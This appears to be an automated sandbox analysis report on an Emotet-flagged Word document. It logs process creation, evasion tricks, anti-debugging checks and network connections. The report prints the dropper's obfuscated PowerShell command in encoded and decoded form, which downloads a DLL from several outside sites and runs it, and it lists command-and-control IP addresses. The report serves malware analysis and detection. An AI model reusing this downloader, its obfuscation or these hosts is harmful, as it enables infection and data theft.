Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\Kaktksw\An6othh\N49I.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00241D4D mov eax, dword ptr fs:[00000030h] 7_2_00241D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005112C1 mov eax, dword ptr fs:[00000030h] 7_2_005112C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00231D4D mov eax, dword ptr fs:[00000030h] 8_2_00231D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D12C1 mov eax, dword ptr fs:[00000030h] 8_2_002D12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E12C1 mov eax, dword ptr fs:[00000030h] 9_2_001E12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C12C1 mov eax, dword ptr fs:[00000030h] 10_2_001C12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002212C1 mov eax, dword ptr fs:[00000030h] 11_2_002212C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001812C1 mov eax, dword ptr fs:[00000030h] 12_2_001812C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00711D4D mov eax, dword ptr fs:[00000030h] 13_2_00711D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006A12C1 mov eax, dword ptr fs:[00000030h] 13_2_006A12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00741D4D mov eax, dword ptr fs:[00000030h] 14_2_00741D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_007E12C1 mov eax, dword ptr fs:[00000030h] 14_2_007E12C1
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 217.160.169.110 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.255.203.164 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.183.16.47 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 84.232.229.24 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ') Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwB
wACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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 Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, type: MEMORY
